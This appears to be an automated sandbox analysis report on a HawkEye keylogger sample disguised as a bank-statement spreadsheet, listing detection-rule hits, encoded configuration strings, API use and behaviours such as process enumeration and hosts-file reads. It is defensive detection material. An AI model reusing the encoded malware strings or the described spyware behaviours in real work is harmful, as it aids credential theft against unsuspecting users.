                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.csBase64 encoded string: 'V9z0MtEfK2EI50ruA/sX5435SES1SZRTR7cTqTnmp3AxYZifJxwgy7QFTKhlmSGx', 'xs2M8HBBKsXOBp/txdt4WH36BZtFcWtpatuDMJkzHUo9RE6HRhBOXZQPez9CEdmS', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, Form1.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@53/29@20/4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00420114 GetLastError,FormatMessageA,0_2_00420114
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00408ACA GetDiskFreeSpaceA,0_2_00408ACA
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,7_2_00411196
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004168F4 FindResourceA,LoadResource,SizeofResource,LockResource,0_2_004168F4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile created: C:\Users\user\AppData\Roaming\pid.txtJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER65F6.tmpJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hosts
